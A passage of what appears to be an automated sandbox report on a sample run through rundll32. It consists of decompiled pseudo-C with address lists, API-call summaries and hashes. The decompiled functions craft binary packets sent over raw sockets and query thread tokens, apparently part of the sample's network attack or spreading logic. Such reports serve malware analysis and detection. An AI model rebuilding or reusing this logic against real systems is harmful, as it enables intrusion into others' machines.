                                                                                                          									if(E04A440E3(_v16, _a12, _a4,  *_a8, ( *(_v16 + 0x67) & 0x000000ff) + _v36, 0, (_t305 & 0x0000ffff) + _v12 + 1 + 3, 4) != 0 && E04A440E3( *_a16, _t260, _a4,  *_t281, _v28, _v24, _v12, _t305) != 0) {
                                                                                                          										_v5 = 1;
                                                                                                          									}
                                                                                                          									_t303 = _v12;
                                                                                                          									goto L35;
                                                                                                          								}
                                                                                                          								_t261 = _t258 - 1;
                                                                                                          								_t211 = _t234;
                                                                                                          								if(_t261 == 0) {
                                                                                                          									_t262 = _v24;
                                                                                                          									_t212 = _t211 + 0x20;
                                                                                                          									 *((intOrPtr*)(_t303 + 1)) = _t212;
                                                                                                          									asm("adc ecx, edx");
                                                                                                          									 *(_t303 + 5) = _t262;
                                                                                                          									 *((intOrPtr*)(_t303 + 0x11)) = _t212 + 0xc;
                                                                                                          									 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                          									asm("adc ecx, edx");
                                                                                                          									 *(_t303 + 0x15) = _t262;
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									_a12 = 2;
                                                                                                          									asm("movsd");
                                                                                                          									_push(0x3c);
                                                                                                          								} else {
                                                                                                          									_t264 = _v24;
                                                                                                          									if(_t261 == 1) {
                                                                                                          										_t214 = _t211 + 0x30;
                                                                                                          										 *((intOrPtr*)(_t303 + 1)) = _t214;
                                                                                                          										asm("adc ecx, edx");
                                                                                                          										 *(_t303 + 5) = _t264;
                                                                                                          										 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                          										_t215 = _t214 + 0xc;
                                                                                                          										 *((intOrPtr*)(_t303 + 0x11)) = _t215;
                                                                                                          										asm("adc ecx, edx");
                                                                                                          										 *(_t303 + 0x15) = _t264;
                                                                                                          										 *((char*)(_t303 + 0x29)) = 7;
                                                                                                          										 *((intOrPtr*)(_t303 + 0x21)) = _t215 + 0x10;
                                                                                                          										asm("adc ecx, edx");
                                                                                                          										 *(_t303 + 0x25) = _t264;
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										_a12 = 3;
                                                                                                          										_push(0x58);
                                                                                                          									} else {
                                                                                                          										_t218 = _t211 + 0x40;
                                                                                                          										 *((intOrPtr*)(_t303 + 1)) = _t218;
                                                                                                          										asm("adc ecx, edx");
                                                                                                          										 *(_t303 + 5) = _t264;
                                                                                                          										 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                          										_t219 = _t218 + 0xc;
                                                                                                          										 *((intOrPtr*)(_t303 + 0x11)) = _t219;
                                                                                                          										asm("adc ecx, edx");
                                                                                                          										 *(_t303 + 0x15) = _t264;
                                                                                                          										 *((char*)(_t303 + 0x29)) = 7;
                                                                                                          										_t220 = _t219 + 0x10;
                                                                                                          										 *((intOrPtr*)(_t303 + 0x21)) = _t220;
                                                                                                          										asm("adc ecx, edx");
                                                                                                          										 *(_t303 + 0x25) = _t264;
                                                                                                          										 *((char*)(_t303 + 0x39)) = 7;
                                                                                                          										 *((intOrPtr*)(_t303 + 0x31)) = _t220 + 0xc;
                                                                                                          										asm("adc ecx, edx");
                                                                                                          										 *(_t303 + 0x35) = _t264;
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										asm("movsd");
                                                                                                          										_a12 = 4;
                                                                                                          										_push(0x74);
                                                                                                          									}
                                                                                                          								}
                                                                                                          								goto L31;
                                                                                                          							}
                                                                                                          							_t265 = _t257 - 1;
                                                                                                          							if(_t265 == 0) {
                                                                                                          								_a12 = 1;
                                                                                                          								_t235 = _t234 + 8;
                                                                                                          								_push(0x14);
                                                                                                          								goto L30;
                                                                                                          							}
                                                                                                          							_t266 = _t265 - 1;
                                                                                                          							if(_t266 == 0) {
                                                                                                          								_t238 = _t234 + 0x10;
                                                                                                          								 *((intOrPtr*)(_t303 + 1)) = _t238;
                                                                                                          								 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                          								 *((intOrPtr*)(_t303 + 9)) = _t238 + 0xc;
                                                                                                          								asm("movsd");
                                                                                                          								asm("movsd");
                                                                                                          								asm("movsd");
                                                                                                          								_a12 = 2;
                                                                                                          								asm("movsd");
                                                                                                          								_push(0x2c);
                                                                                                          							} else {
                                                                                                          								if(_t266 == 1) {
                                                                                                          									_t240 = _t234 + 0x18;
                                                                                                          									 *((intOrPtr*)(_t303 + 1)) = _t240;
                                                                                                          									 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                          									_t241 = _t240 + 0xc;
                                                                                                          									 *((intOrPtr*)(_t303 + 9)) = _t241;
                                                                                                          									 *(_t303 + 0x15) = 7;
                                                                                                          									 *((intOrPtr*)(_t303 + 0x11)) = _t241 + 0x10;
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									_a12 = 3;
                                                                                                          									_push(0x40);
                                                                                                          								} else {
                                                                                                          									_t243 = _t234 + 0x20;
                                                                                                          									 *((intOrPtr*)(_t303 + 1)) = _t243;
                                                                                                          									 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                          									_t244 = _t243 + 0xc;
                                                                                                          									 *((intOrPtr*)(_t303 + 9)) = _t244;
                                                                                                          									 *(_t303 + 0x15) = 7;
                                                                                                          									_t245 = _t244 + 0x10;
                                                                                                          									 *((intOrPtr*)(_t303 + 0x11)) = _t245;
                                                                                                          									 *((char*)(_t303 + 0x1d)) = 7;
                                                                                                          									 *((intOrPtr*)(_t303 + 0x19)) = _t245 + 0xc;
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									_a12 = 4;
                                                                                                          									_push(0x54);
                                                                                                          								}
                                                                                                          							}
                                                                                                          							goto L31;
                                                                                                          						}
                                                                                                          					} else {
                                                                                                          						goto L35;
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}



















































                                                                                                          0x04a441e9
                                                                                                          0x04a441e9
                                                                                                          0x04a441f9
                                                                                                          0x04a4420a
                                                                                                          0x04a4420c
                                                                                                          0x04a44211
                                                                                                          0x04a44679
                                                                                                          0x04a44680
                                                                                                          0x04a44680
                                                                                                          0x04a44217
                                                                                                          0x04a4421c
                                                                                                          0x04a44224
                                                                                                          0x04a4422a
                                                                                                          0x04a4423f
                                                                                                          0x04a44669
                                                                                                          0x04a44673
                                                                                                          0x00000000
                                                                                                          0x04a44673
                                                                                                          0x04a44245
                                                                                                          0x04a4426b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a44273
                                                                                                          0x04a44277
                                                                                                          0x04a4427a
                                                                                                          0x04a44284
                                                                                                          0x04a4428e
                                                                                                          0x04a44294
                                                                                                          0x04a4429a
                                                                                                          0x04a44683
                                                                                                          0x04a44689
                                                                                                          0x04a4468f
                                                                                                          0x04a446a6
                                                                                                          0x04a446bf
                                                                                                          0x04a446c1
                                                                                                          0x04a446c1
                                                                                                          0x00000000
                                                                                                          0x04a446bf
                                                                                                          0x04a44691
                                                                                                          0x04a44693
                                                                                                          0x04a44696
                                                                                                          0x04a4469e
                                                                                                          0x04a446a2
                                                                                                          0x04a446a3
                                                                                                          0x04a446a3
                                                                                                          0x00000000
                                                                                                          0x04a442a0
                                                                                                          0x04a442a0
                                                                                                          0x04a442a5
                                                                                                          0x04a442ad
                                                                                                          0x04a442b0
                                                                                                          0x04a442b3
                                                                                                          0x04a442c9
                                                                                                          0x04a442e8
                                                                                                          0x04a442ea
                                                                                                          0x04a442cb
                                                                                                          0x04a442cb
                                                                                                          0x04a442ce
                                                                                                          0x04a442d1
                                                                                                          0x04a442d6
                                                                                                          0x04a442e0
                                                                                                          0x04a442e0
                                                                                                          0x04a442c9
                                                                                                          0x04a442ef
                                                                                                          0x04a44307
                                                                                                          0x04a4430a
                                                                                                          0x04a4431f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a44325
                                                                                                          0x04a44328
                                                                                                          0x04a44330
                                                                                                          0x04a44333
                                                                                                          0x04a4433d
                                                                                                          0x04a44343
                                                                                                          0x04a44347
                                                                                                          0x04a4434f
                                                                                                          0x04a44351
                                                                                                          0x04a44351
                                                                                                          0x04a44370
                                                                                                          0x00000000
                                                                                                          0x04a44376
                                                                                                          0x04a44376
                                                                                                          0x04a4437c
                                                                                                          0x04a4437f
                                                                                                          0x04a44383
                                                                                                          0x04a44390
                                                                                                          0x04a44393
                                                                                                          0x04a44396
                                                                                                          0x04a443a0
                                                                                                          0x04a443ae
                                                                                                          0x04a443bb
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a443c1
                                                                                                          0x04a443c3
                                                                                                          0x04a443c9
                                                                                                          0x04a443cf
                                                                                                          0x04a444d1
                                                                                                          0x04a444d2
                                                                                                          0x04a445ef
                                                                                                          0x04a445f5
                                                                                                          0x04a445f8
                                                                                                          0x04a445fa
                                                                                                          0x04a44600
                                                                                                          0x04a44602
                                                                                                          0x04a44602
                                                                                                          0x04a4460a
                                                                                                          0x04a44610
                                                                                                          0x04a44611
                                                                                                          0x04a44612
                                                                                                          0x04a44613
                                                                                                          0x04a44614
                                                                                                          0x04a4461e
                                                                                                          0x04a44621
                                                                                                          0x04a4462e
                                                                                                          0x04a44632
                                                                                                          0x04a44643
                                                                                                          0x04a44662
                                                                                                          0x04a44662
                                                                                                          0x04a44666
                                                                                                          0x00000000
                                                                                                          0x04a44666
                                                                                                          0x04a444d8
                                                                                                          0x04a444d9
                                                                                                          0x04a444db
                                                                                                          0x04a445b0
                                                                                                          0x04a445b3
                                                                                                          0x04a445b6
                                                                                                          0x04a445b9
                                                                                                          0x04a445bb
                                                                                                          0x04a445c1
                                                                                                          0x04a445c4
                                                                                                          0x04a445cb
                                                                                                          0x04a445cd
                                                                                                          0x04a445d5
                                                                                                          0x04a445d6
                                                                                                          0x04a445d7
                                                                                                          0x04a445e3
                                                                                                          0x04a445ea
                                                                                                          0x04a445eb
                                                                                                          0x04a444e1
                                                                                                          0x04a444e2
                                                                                                          0x04a444e5
                                                                                                          0x04a4455a
                                                                                                          0x04a4455d
                                                                                                          0x04a44560
                                                                                                          0x04a44562
                                                                                                          0x04a44565
                                                                                                          0x04a44569
                                                                                                          0x04a4456c
                                                                                                          0x04a44572
                                                                                                          0x04a44574
                                                                                                          0x04a44577
                                                                                                          0x04a4457e
                                                                                                          0x04a44584
                                                                                                          0x04a44586
                                                                                                          0x04a4458e
                                                                                                          0x04a4458f
                                                                                                          0x04a44590
                                                                                                          0x04a44599
                                                                                                          0x04a4459a
                                                                                                          0x04a4459b
                                                                                                          0x04a4459c
                                                                                                          0x04a4459d
                                                                                                          0x04a445ac
                                                                                                          0x04a444e7
                                                                                                          0x04a444e7
                                                                                                          0x04a444ea
                                                                                                          0x04a444ed
                                                                                                          0x04a444ef
                                                                                                          0x04a444f2
                                                                                                          0x04a444f6
                                                                                                          0x04a444f9
                                                                                                          0x04a444ff
                                                                                                          0x04a44501
                                                                                                          0x04a44504
                                                                                                          0x04a44508
                                                                                                          0x04a4450b
                                                                                                          0x04a4450e
                                                                                                          0x04a44510
                                                                                                          0x04a44513
                                                                                                          0x04a4451a
                                                                                                          0x04a44520
                                                                                                          0x04a44522
                                                                                                          0x04a4452a
                                                                                                          0x04a4452b
                                                                                                          0x04a4452c
                                                                                                          0x04a44535
                                                                                                          0x04a44536
                                                                                                          0x04a44537
                                                                                                          0x04a44538
                                                                                                          0x04a44541
                                                                                                          0x04a44542
                                                                                                          0x04a44543
                                                                                                          0x04a44544
                                                                                                          0x04a44553
                                                                                                          0x04a44553
                                                                                                          0x04a444e5
                                                                                                          0x00000000
                                                                                                          0x04a444db
                                                                                                          0x04a443d5
                                                                                                          0x04a443d6
                                                                                                          0x04a444c1
                                                                                                          0x04a444c4
                                                                                                          0x04a444ca
                                                                                                          0x00000000
                                                                                                          0x04a444ca
                                                                                                          0x04a443dc
                                                                                                          0x04a443dd
                                                                                                          0x04a4448c
                                                                                                          0x04a4448f
                                                                                                          0x04a44492
                                                                                                          0x04a4449c
                                                                                                          0x04a444a4
                                                                                                          0x04a444a5
                                                                                                          0x04a444a6
                                                                                                          0x04a444b2
                                                                                                          0x04a444b9
                                                                                                          0x04a444ba
                                                                                                          0x04a443e3
                                                                                                          0x04a443e7
                                                                                                          0x04a44445
                                                                                                          0x04a44448
                                                                                                          0x04a4444b
                                                                                                          0x04a44452
                                                                                                          0x04a44455
                                                                                                          0x04a44458
                                                                                                          0x04a4445f
                                                                                                          0x04a44467
                                                                                                          0x04a44468
                                                                                                          0x04a44469
                                                                                                          0x04a44472
                                                                                                          0x04a44473
                                                                                                          0x04a44474
                                                                                                          0x04a44475
                                                                                                          0x04a44476
                                                                                                          0x04a44485
                                                                                                          0x04a443e9
                                                                                                          0x04a443e9
                                                                                                          0x04a443ec
                                                                                                          0x04a443ef
                                                                                                          0x04a443f6
                                                                                                          0x04a443f9
                                                                                                          0x04a443fc
                                                                                                          0x04a44400
                                                                                                          0x04a44403
                                                                                                          0x04a44406
                                                                                                          0x04a4440d
                                                                                                          0x04a44415
                                                                                                          0x04a44416
                                                                                                          0x04a44417
                                                                                                          0x04a44420
                                                                                                          0x04a44421
                                                                                                          0x04a44422
                                                                                                          0x04a44423
                                                                                                          0x04a4442c
                                                                                                          0x04a4442d
                                                                                                          0x04a4442e
                                                                                                          0x04a4442f
                                                                                                          0x04a4443e
                                                                                                          0x04a4443e
                                                                                                          0x04a443e7
                                                                                                          0x00000000
                                                                                                          0x04a443dd
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a442ef

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74714F20), ref: 04A441FD
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A44204
                                                                                                            • Part of subcall function 04A440E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A440F8
                                                                                                            • Part of subcall function 04A440E3: HeapAlloc.KERNEL32(00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A440FB
                                                                                                            • Part of subcall function 04A440E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A44148
                                                                                                            • Part of subcall function 04A440E3: HeapAlloc.KERNEL32(00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A4414B
                                                                                                            • Part of subcall function 04A440E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04A4423D,?,?,?,?,00000000), ref: 04A44184
                                                                                                            • Part of subcall function 04A440E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,04A4423E,?,?,?,04A4423D,?,?,?,?,00000000), ref: 04A441BC
                                                                                                            • Part of subcall function 04A440E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04A4423D,?,?,?,?), ref: 04A441CB
                                                                                                            • Part of subcall function 04A440E3: HeapFree.KERNEL32(00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A441CE
                                                                                                            • Part of subcall function 04A440E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A441D7
                                                                                                            • Part of subcall function 04A440E3: HeapFree.KERNEL32(00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A441DA
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 04A44287
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A4428E
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04A442D9
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A442E0
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04A44336
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A4433D
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,74714F20,?,00000000,00000100,?), ref: 04A44399
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A443A0
                                                                                                          • memset.MSVCRT ref: 04A443AE
                                                                                                            • Part of subcall function 04A43D0D: rand.MSVCRT ref: 04A43EC3
                                                                                                            • Part of subcall function 04A43D0D: memset.MSVCRT ref: 04A43EFC
                                                                                                            • Part of subcall function 04A43D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04A43F38
                                                                                                            • Part of subcall function 04A43D0D: htons.WS2_32(?), ref: 04A43F5C
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 04A4466C
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A44673
                                                                                                            • Part of subcall function 04A43D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74714F20,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?), ref: 04A43D2B
                                                                                                            • Part of subcall function 04A43D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A43D34
                                                                                                            • Part of subcall function 04A43D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04A43D46
                                                                                                            • Part of subcall function 04A43D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A43D49
                                                                                                            • Part of subcall function 04A43D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04A43D63
                                                                                                            • Part of subcall function 04A43D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A43D66
                                                                                                            • Part of subcall function 04A43D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04A44269,?,00000000,?,?,?), ref: 04A43E5B
                                                                                                            • Part of subcall function 04A43D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04A43E65
                                                                                                            • Part of subcall function 04A43D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04A44269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04A43E68
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$Sleep$memset$htonsrandrecv
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 2891003447-636472023
                                                                                                          • Opcode ID: 36c0cba0ea9e96a58c71454dde22cd6b38bef866f9eaf22b76c069522af7d3ce
                                                                                                          • Instruction ID: 6e8b94eb39bf65b6a23ca792c104dc94baaa1b0f7b4b7e3ce116943033b1529a
                                                                                                          • Opcode Fuzzy Hash: 36c0cba0ea9e96a58c71454dde22cd6b38bef866f9eaf22b76c069522af7d3ce
                                                                                                          • Instruction Fuzzy Hash: 0FF15C759047059FEB11CF44C844AAFBBB2EFC9304F09885DE949AB752C3B5EA15CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 68%
                                                                                                          			E04A42E12(intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                          				char _v5;
                                                                                                          				intOrPtr _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _t43;
                                                                                                          				void* _t49;
                                                                                                          				short _t52;
                                                                                                          				short _t53;
                                                                                                          				short _t54;
                                                                                                          				short _t55;
                                                                                                          				short _t60;
                                                                                                          				void* _t65;
                                                                                                          				signed int _t67;
                                                                                                          				void* _t75;
                                                                                                          				signed int _t78;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_v12 = 0xbadf00d;
                                                                                                          				_t43 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v16 = _t43;
                                                                                                          				if(_t43 == 0) {
                                                                                                          					L14:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t65 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                          				if(_t65 == 0) {
                                                                                                          					L13:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                          					goto L14;
                                                                                                          				}
                                                                                                          				_t67 = 9;
                                                                                                          				_t49 = memcpy(_t65, _a8, _t67 << 2);
                                                                                                          				__imp__#9(0x44);
                                                                                                          				 *(_t65 + 0x31) =  *(_t65 + 0x31) | 0xffffffff;
                                                                                                          				 *(_t65 + 2) = _t49;
                                                                                                          				_t78 = _a8;
                                                                                                          				 *((short*)(_t65 + 0x25)) = 0xfc;
                                                                                                          				 *((short*)(_t65 + 0x27)) = 0xec0;
                                                                                                          				_t52 = 0x40;
                                                                                                          				 *((short*)(_t65 + 0x29)) = _t52;
                                                                                                          				_t53 = 4;
                                                                                                          				 *((short*)(_t65 + 0x37)) = _t53;
                                                                                                          				_t54 = 0x40;
                                                                                                          				 *((short*)(_t65 + 0x39)) = _t54;
                                                                                                          				_t55 = 5;
                                                                                                          				 *((short*)(_t65 + 0x41)) = _t55;
                                                                                                          				 *((char*)(_t65 + 8)) = 0x25;
                                                                                                          				 *((char*)(_t65 + 0x24)) = 0xe;
                                                                                                          				 *((short*)(_t65 + 0x44)) = _a12;
                                                                                                          				_a8 = _a8 & 0x00000000;
                                                                                                          				 *(_t78 + 0x22) = ( *(_t78 + 0x22) & 0x0000ff00) - 0x100;
                                                                                                          				L3:
                                                                                                          				L3:
                                                                                                          				if(_a8 != 8) {
                                                                                                          					 *(_t78 + 0x22) =  *(_t78 + 0x22) + 1;
                                                                                                          					_t60 =  *(_t78 + 0x22);
                                                                                                          				} else {
                                                                                                          					_t60 = _a12;
                                                                                                          				}
                                                                                                          				 *((short*)(_t65 + 0x22)) = _t60;
                                                                                                          				__imp__#19(_a4, _t65, 0x48, 0);
                                                                                                          				if(_t60 > 0) {
                                                                                                          					_t75 = _v16;
                                                                                                          					__imp__#16(_a4, _t75, 0xffff, 0);
                                                                                                          					if(_t60 > 0) {
                                                                                                          						_v12 =  *((intOrPtr*)(_t75 + 9));
                                                                                                          					}
                                                                                                          				}
                                                                                                          				if(_v12 != 0) {
                                                                                                          					goto L12;
                                                                                                          				}
                                                                                                          				_a8 = _a8 + 1;
                                                                                                          				if(_a8 < 0xc) {
                                                                                                          					goto L3;
                                                                                                          				}
                                                                                                          				_v5 = 1;
                                                                                                          				L12:
                                                                                                          				HeapFree(GetProcessHeap(), 8, _t65);
                                                                                                          				goto L13;
                                                                                                          			}

















                                                                                                          0x04a42e27
                                                                                                          0x04a42e2b
                                                                                                          0x04a42e3b
                                                                                                          0x04a42e3d
                                                                                                          0x04a42e42
                                                                                                          0x04a42f51
                                                                                                          0x04a42f57
                                                                                                          0x04a42f57
                                                                                                          0x04a42e52
                                                                                                          0x04a42e56
                                                                                                          0x04a42f3e
                                                                                                          0x04a42f4a
                                                                                                          0x00000000
                                                                                                          0x04a42f50
                                                                                                          0x04a42e61
                                                                                                          0x04a42e66
                                                                                                          0x04a42e68
                                                                                                          0x04a42e6e
                                                                                                          0x04a42e72
                                                                                                          0x04a42e76
                                                                                                          0x04a42e80
                                                                                                          0x04a42e89
                                                                                                          0x04a42e8d
                                                                                                          0x04a42e8e
                                                                                                          0x04a42e94
                                                                                                          0x04a42e95
                                                                                                          0x04a42e9b
                                                                                                          0x04a42e9c
                                                                                                          0x04a42ea2
                                                                                                          0x04a42ea3
                                                                                                          0x04a42eab
                                                                                                          0x04a42eaf
                                                                                                          0x04a42eb3
                                                                                                          0x04a42ecb
                                                                                                          0x04a42ecf
                                                                                                          0x00000000
                                                                                                          0x04a42ed3
                                                                                                          0x04a42ed7
                                                                                                          0x04a42edf
                                                                                                          0x04a42ee3
                                                                                                          0x04a42ed9
                                                                                                          0x04a42ed9
                                                                                                          0x04a42ed9
                                                                                                          0x04a42eef
                                                                                                          0x04a42ef3
                                                                                                          0x04a42efb
                                                                                                          0x04a42efd
                                                                                                          0x04a42f0b
                                                                                                          0x04a42f13
                                                                                                          0x04a42f18
                                                                                                          0x04a42f18
                                                                                                          0x04a42f13
                                                                                                          0x04a42f1f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42f21
                                                                                                          0x04a42f28
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42f2a
                                                                                                          0x04a42f2e
                                                                                                          0x04a42f38
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04A42E32
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A42E3B
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000048,74714F20), ref: 04A42E4D
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A42E50
                                                                                                          • htons.WS2_32(00000044), ref: 04A42E68
                                                                                                          • send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04A42EF3
                                                                                                          • recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04A42F0B
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A42F31
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A42F38
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A42F43
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A42F4A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 1780562090-636472023
                                                                                                          • Opcode ID: 681bf42205bf37d9d9fa94422bf30ba978790d631c0a12bc8204e5ee65c97111
                                                                                                          • Instruction ID: 804596dcf85f7f84666d5703089bf7bb89668724bfb9ad7993eb8dd5b1c89417
                                                                                                          • Opcode Fuzzy Hash: 681bf42205bf37d9d9fa94422bf30ba978790d631c0a12bc8204e5ee65c97111
                                                                                                          • Instruction Fuzzy Hash: 2641B13A640345AAEB109FA4D845BAE7BB4FFD8710F108499FA099F2C1D779D845CB18
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4892A() {
                                                                                                          				long _v8;
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				char* _t31;
                                                                                                          				DWORD* _t32;
                                                                                                          				long _t33;
                                                                                                          				void* _t37;
                                                                                                          				void* _t39;
                                                                                                          				void** _t43;
                                                                                                          
                                                                                                          				_v16 = 0;
                                                                                                          				_v12 = 0;
                                                                                                          				if(OpenThreadToken(GetCurrentThread(), 0x20008, 1,  &_v12) == 0) {
                                                                                                          					GetLastError();
                                                                                                          					L23:
                                                                                                          					return _v16;
                                                                                                          				}
                                                                                                          				_v8 = 0;
                                                                                                          				if(GetTokenInformation(_v12, 2, 0, 0,  &_v8) != 0) {
                                                                                                          					L21:
                                                                                                          					CloseHandle(_v12);
                                                                                                          					goto L23;
                                                                                                          				}
                                                                                                          				if(GetLastError() != 0x7a) {
                                                                                                          					L20:
                                                                                                          					goto L21;
                                                                                                          				}
